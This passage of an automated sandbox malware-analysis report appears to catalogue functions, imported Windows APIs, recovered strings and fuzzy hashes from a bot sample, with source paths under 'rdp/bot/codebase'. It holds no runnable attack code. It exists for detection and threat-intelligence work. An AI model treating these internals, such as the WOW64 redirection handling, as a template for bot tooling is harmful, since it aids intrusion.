                                                                                                                  • Instruction ID: 253201d1310a567e06518b33b52c676ace01f975a9845996b40c2bce0fcaa851
                                                                                                                  • Opcode Fuzzy Hash: 7d68ca7b8cc9e4de448433a8525fc56b3e75110361bbb132b1ea392003ac8ac3
                                                                                                                  • Instruction Fuzzy Hash: 1A216B71608A8795E711EF55F850BAEB260AB847A4F848033EE4C47754DFBDE985C720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                  • String ID: (file_path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$fs_module_file$service
                                                                                                                  • API String ID: 3951308622-1028023324
                                                                                                                  • Opcode ID: 555ce83f1a7f58de38076c6efa6d56c9e194a2ccc4c1a4ca5d422a016d7d6344
                                                                                                                  • Instruction ID: d9c8807c55fa33dd566adabb367da74b1b3fb6014bf24663b730c273a3b1a320
                                                                                                                  • Opcode Fuzzy Hash: 555ce83f1a7f58de38076c6efa6d56c9e194a2ccc4c1a4ca5d422a016d7d6344
                                                                                                                  • Instruction Fuzzy Hash: D3116D71A086C344FB15FE699D20BBDAA911F157E8F885032DE4D0B3D6DEAD980582A0
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
                                                                                                                  • API String ID: 1004003707-3780280517
                                                                                                                  • Opcode ID: dabe79df07e4a5a8dd397160ec46bd02f00771210cc9d8bdbbda1e8125300aed
                                                                                                                  • Instruction ID: 38625713c663f967fa4355277a03585183a9f72ca30d79c3e181b96c229c2a6f
                                                                                                                  • Opcode Fuzzy Hash: dabe79df07e4a5a8dd397160ec46bd02f00771210cc9d8bdbbda1e8125300aed
                                                                                                                  • Instruction Fuzzy Hash: ED410471B0868791FB10EF55A950BBCA260AF04368F948137DE4D07695DFBEEA86C360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strcmp
                                                                                                                  • String ID: (ini != NULL)$(name != NULL)$(sec != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(name=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(name=%s,err=%08x)$ini_get_sec
                                                                                                                  • API String ID: 1004003707-386092548
                                                                                                                  • Opcode ID: 603ca290bf209a878f6e868cf7e223666875e6445b81fdf84269e7a9617f625c
                                                                                                                  • Instruction ID: dbf1b8ebcbe025e115860db8f7bc703f5f15cb7394644d175f3dae832648e6f2
                                                                                                                  • Opcode Fuzzy Hash: 603ca290bf209a878f6e868cf7e223666875e6445b81fdf84269e7a9617f625c
                                                                                                                  • Instruction Fuzzy Hash: 49410871A08587A1FB50AF51A960BBCA260AF01368FC48033DE4D4B691DFBDE986D360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Virtual$ErrorLastProtectQuery
                                                                                                                  • String ID: Unknown pseudo relocation protocol version %d.$ VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                                                                  • API String ID: 637304234-2693646698
                                                                                                                  • Opcode ID: 8add22a7cc3fa846a04094a8ab67a6e2d6d24e8b84f6c34f8bfff9ca3ede8a1a
                                                                                                                  • Instruction ID: 1862ea7d695d1f800068523e09d2d247e361e7e8ec951b2dedda29b32ee495a0
                                                                                                                  • Opcode Fuzzy Hash: 8add22a7cc3fa846a04094a8ab67a6e2d6d24e8b84f6c34f8bfff9ca3ede8a1a
                                                                                                                  • Instruction Fuzzy Hash: A931A035B09A8686EB04EF25E851AACA361FB94BB4F848136DD0C47354DEBDE446C360
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: _errno
                                                                                                                  • String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtoul failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint32
                                                                                                                  • API String ID: 2918714741-1670302297
                                                                                                                  • Opcode ID: 13d5c5678f11fb37cf099ef68e4cb27cc21ac9529200067acbd87b04a0ad8171
                                                                                                                  • Instruction ID: aee6f2b65233784c9aebc2235c64ad829fd8141d686d0820001dbb064aeb9fb2
                                                                                                                  • Opcode Fuzzy Hash: 13d5c5678f11fb37cf099ef68e4cb27cc21ac9529200067acbd87b04a0ad8171
                                                                                                                  • Instruction Fuzzy Hash: C8218071A0868696E710EF15E840BADB760BB447A4FC44137EE4C47754DFBDE849C760
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                  • String ID: SystemFunction036$advapi32.dll$msvcrt.dll$rand_s
                                                                                                                  • API String ID: 384173800-4041758303
                                                                                                                  • Opcode ID: 33cba482a29e878b2114b817fbad7b4337690f04b4dd8230bf2d19bb2c54ff2f
                                                                                                                  • Instruction ID: 6109d933764b8255b5c2c730b8c80df541c4631fc1a7526ebf695d1e4d5b83ec
                                                                                                                  • Opcode Fuzzy Hash: 33cba482a29e878b2114b817fbad7b4337690f04b4dd8230bf2d19bb2c54ff2f
                                                                                                                  • Instruction Fuzzy Hash: 5EF0B724E0AA9794EB05FF11FC649B9A7A4BF187B4BC40533C80D47320EFADA55AC324
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: strlen
                                                                                                                  • String ID: ((match == NULL) || (match_len != NULL))$(needle != NULL)$(pattern != NULL)$C:/Projects/rdp/bot/codebase/utils.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$str_match
                                                                                                                  • API String ID: 39653677-892027187
                                                                                                                  • Opcode ID: 51c6127cf5878e06315752245c4e77c7e4c4891824f2a5c223a2873cb35ce124
                                                                                                                  • Instruction ID: f2107c73a87cebb2f2181abc0a60c10ea5faf1eb1d3da47efae24d1016a5bbc8
                                                                                                                  • Opcode Fuzzy Hash: 51c6127cf5878e06315752245c4e77c7e4c4891824f2a5c223a2873cb35ce124
                                                                                                                  • Instruction Fuzzy Hash: 5451B161A082C756FB1AEE59B810FBD96517F117E8FC88033DD0E07291DEAEE561C360
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF7C1AB2304: LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312
                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF7C1AB42C8
                                                                                                                    • Part of subcall function 00007FF7C1AB2283: GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastLibraryLoadProc
                                                                                                                  • String ID: Done$Wow64RevertWow64FsRedirection$[E] (%s) -> Wow64RevertWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_revert$kernel32
                                                                                                                  • API String ID: 3511525774-1584720945
                                                                                                                  • Opcode ID: 22c809322a5359600a0158dc99ea597a4efdb57cbb3d581b66afce8e9f2be1f2
                                                                                                                  • Instruction ID: 69ad1fd50865a49f76bb0772f08f8d186997cec4c6ec6f2a119ec61893035716
                                                                                                                  • Opcode Fuzzy Hash: 22c809322a5359600a0158dc99ea597a4efdb57cbb3d581b66afce8e9f2be1f2
                                                                                                                  • Instruction Fuzzy Hash: B4119D70A0D68384FB54FF15A860BB8A2516F41369FC40437D81E877A2EEAEE544D720
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 00007FF7C1AB2304: LoadLibraryA.KERNEL32(?,?,service,00000157C50713D0,00007FF7C1AB2910), ref: 00007FF7C1AB2312
                                                                                                                    • Part of subcall function 00007FF7C1AB2283: GetProcAddress.KERNEL32(?,?,00000000,00000157C50713D0,?,00007FF7C1AB292B), ref: 00007FF7C1AB22A3
                                                                                                                  • GetLastError.KERNEL32 ref: 00007FF7C1AB4210
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AddressErrorLastLibraryLoadProcfflushfwrite
                                                                                                                  • String ID: Done$Wow64DisableWow64FsRedirection$[E] (%s) -> Wow64DisableWow64FsRedirection failed(gle=%lu)$[I] (%s) -> %s$fs_wow_redir_disable$kernel32
                                                                                                                  • API String ID: 1533789296-1853374401
                                                                                                                  • Opcode ID: a7c5e058be7684d559b53000f29e671dff9ea714b7f7818c333df49b89397c50
                                                                                                                  • Instruction ID: fd38a69c6d4b890a5d47f393538bcae710a6e9e93c09ac45c6788a4af1d94140
                                                                                                                  • Opcode Fuzzy Hash: a7c5e058be7684d559b53000f29e671dff9ea714b7f7818c333df49b89397c50
                                                                                                                  • Instruction Fuzzy Hash: 990180B4A09A8394FB64FF15A860BBCD6526F51364FC40037D81E877A1EEBEE945D320
                                                                                                                  APIs
                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AA1
                                                                                                                  • GetProcessHeap.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AD4
                                                                                                                  • HeapFree.KERNEL32(?,?,00000000,00000157C50713D0,00007FF7C1AB1E50,?,?,?,?,?,?,00000001,00007FF7C1AB1FC3,?,?,00007FF7C1AC8508), ref: 00007FF7C1AB1AE5
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeHeap$LibraryProcessfflushfwrite
                                                                                                                  • String ID: [I] (%s) -> Done(name=%s)$units_cleanup
                                                                                                                  • API String ID: 1108967834-2645831314
                                                                                                                  • Opcode ID: c5134a5a516f1671bb31426d62a13ed6907ccb2320aae0fd1190f0fa7e428d56
                                                                                                                  • Instruction ID: 26dcb1eff01a1d70573b834b5d77c4d6a6f44630cf49e3370a4a2cef39ddcf7e
                                                                                                                  • Opcode Fuzzy Hash: c5134a5a516f1671bb31426d62a13ed6907ccb2320aae0fd1190f0fa7e428d56
                                                                                                                  • Instruction Fuzzy Hash: B011DB31A09A8681EB54FF11E850A7CA3A1BB45BA4F884437CD0D07360EFADF955C320
                                                                                                                  APIs
                                                                                                                  • fclose.MSVCRT ref: 00007FF7C1AB3363
                                                                                                                  • DeleteCriticalSection.KERNEL32(?,?,?,?,00007FF7C1AB1B2B,?,?,00000000,00007FF7C1AB1E55,?,?,?,?,?,?,00000001), ref: 00007FF7C1AB3390
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CriticalDeleteSectionfclose
                                                                                                                  • String ID: Done$[I] (%s) -> %s$debug_cleanup
                                                                                                                  • API String ID: 3387974148-4247581856
                                                                                                                  • Opcode ID: ce6166a030d9b927a629bb073a866b08a7422f5c411934c9de2c65f1d8dac0c7
                                                                                                                  • Instruction ID: c853f2d61ebbeda424f1083571d00424d708332578d8456f36666fd24ad34fc6
                                                                                                                  • Opcode Fuzzy Hash: ce6166a030d9b927a629bb073a866b08a7422f5c411934c9de2c65f1d8dac0c7
                                                                                                                  • Instruction Fuzzy Hash: 0FF07F64A0A69285FB18BF55A9B5B7DA2A0BF40724FC4513BC40E473A2CFFEA055C770
                                                                                                                  APIs
                                                                                                                  • VirtualProtect.KERNEL32(?,?,00007FF7C1AC8508,00000000,?,?,?,00007FF7C1AC8500,00007FF7C1AB1208,?,?,?,00007FF7C1AB1313), ref: 00007FF7C1ABA412
                                                                                                                  Strings
                                                                                                                  • Unknown pseudo relocation protocol version %d., xrefs: 00007FF7C1ABA2B2
                                                                                                                  • Unknown pseudo relocation bit size %d., xrefs: 00007FF7C1ABA33B
                                                                                                                  • %d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p., xrefs: 00007FF7C1ABA3AD
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ProtectVirtual
                                                                                                                  • String ID: Unknown pseudo relocation bit size %d.$ Unknown pseudo relocation protocol version %d.$%d bit pseudo relocation at %p out of range, targeting %p, yielding the value %p.
                                                                                                                  • API String ID: 544645111-1286557213
                                                                                                                  • Opcode ID: 92cad9732728847cb24ab556fee675ca99765190e00efc1bf2c038ef7252aea2
                                                                                                                  • Instruction ID: 8e0d0d7ff3b9e08a38e7cb741043a1997e862a38d20d393f69d676b17ed7b2aa
                                                                                                                  • Opcode Fuzzy Hash: 92cad9732728847cb24ab556fee675ca99765190e00efc1bf2c038ef7252aea2
                                                                                                                  • Instruction Fuzzy Hash: B0618C75B096928AEB10EF25D550BBCA760AB407B4F848133CE1D437E5DEBEE581C720
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorHandleLastModule
                                                                                                                  • String ID: [E] (%s) -> GetModuleHandleExA failed(gle=%lu)$module_current
                                                                                                                  • API String ID: 4242514867-2427012484
                                                                                                                  • Opcode ID: 932d8f0b87f2ec5228bf48e551c9c89e3a3dfe2e3e3b4ae9b2d117c7db3c8caa
                                                                                                                  • Instruction ID: dee7a61c85cb8d26b875e90b32b8a135b5f638c925d2bfd74736c939c73028b6
                                                                                                                  • Opcode Fuzzy Hash: 932d8f0b87f2ec5228bf48e551c9c89e3a3dfe2e3e3b4ae9b2d117c7db3c8caa
                                                                                                                  • Instruction Fuzzy Hash: 9AF03930A08A4281E720AF11E854BBEE761FB943A8FC40033D94D037A4DFADE208C760
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Byte$CharMultiWide$Lead_errno
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2766522060-0
                                                                                                                  • Opcode ID: ea0e36834fd6c6aa59ef53b9805da5eb76483b36d931b6280d4f55a8ddee267b
                                                                                                                  • Instruction ID: 87d88ff6b90fde7cc9cab9ea9206e2d958b34e0d70173b2976db42f2bbaa1f90
                                                                                                                  • Opcode Fuzzy Hash: ea0e36834fd6c6aa59ef53b9805da5eb76483b36d931b6280d4f55a8ddee267b
                                                                                                                  • Instruction Fuzzy Hash: 9E31A771A0C3C149F7309F21A800BBDA690AB657A4FA48136DE8D477D5DBBDD4458B21
                                                                                                                  APIs
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000017.00000002.2669011856.00007FF7C1AB1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7C1AB0000, based on PE: true
                                                                                                                  • Associated: 00000017.00000002.2668984253.00007FF7C1AB0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669040522.00007FF7C1AC0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1AC8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669059079.00007FF7C1ACA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  • Associated: 00000017.00000002.2669129949.00007FF7C1ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_23_2_7ff7c1ab0000_main.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: signal
                                                                                                                  • String ID: CCG
                                                                                                                  • API String ID: 1946981877-1584390748
                                                                                                                  • Opcode ID: ae9fd186646b773eee1821a5304905e802156a9f0a9826ef6c2c2d212f40fb0d
                                                                                                                  • Instruction ID: 06ec6bf408a1a3841822ac44d9ceb0259233acd274d8ab77a431fa24872e295f
                                                                                                                  • Opcode Fuzzy Hash: ae9fd186646b773eee1821a5304905e802156a9f0a9826ef6c2c2d212f40fb0d
